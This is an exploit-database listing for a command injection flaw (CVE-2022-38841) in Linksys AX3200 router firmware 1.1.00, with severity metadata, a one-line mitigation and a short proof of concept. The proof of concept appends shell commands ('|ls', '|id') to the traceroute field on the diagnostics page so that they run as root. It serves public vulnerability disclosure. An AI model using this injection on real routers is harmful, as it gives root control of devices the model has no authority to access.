header-logo
Suggest Exploit
vendor:
AX3200
by:
Ahmed Alroky
8.8
CVSS
HIGH
Command Injection
78
CWE
Product Name: AX3200
Affected Version From: 1.1.00
Affected Version To: 1.1.00
Patch Exists: YES
Related CWE: CVE-2022-38841
CPE: h:linksys:ax3200
Metasploit:
Other Scripts:
Platforms Tested: Windows
2022

Linksys AX3200 V1.1.00 – Command Injection

Login into AX3200 webui, go to diagnostics page and put 'google.com|ls' to perform a traceroute. This will get the file list and also one can try 'example.com|id' to ensure that all commands executed as a root user.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in system commands.
Source

Exploit-DB raw data:

# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
# Date: 2022-09-19
# Exploit Author: Ahmed Alroky
# Author: Linksys
# Version: 1.1.00
# Authentication Required: YES
# CVE : CVE-2022-38841

# Tested on: Windows

# Proof Of Concept:

1 - login into AX3200 webui
2 - go to diagnostics page
3 - put "google.com|ls" to perform a traceroute
4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user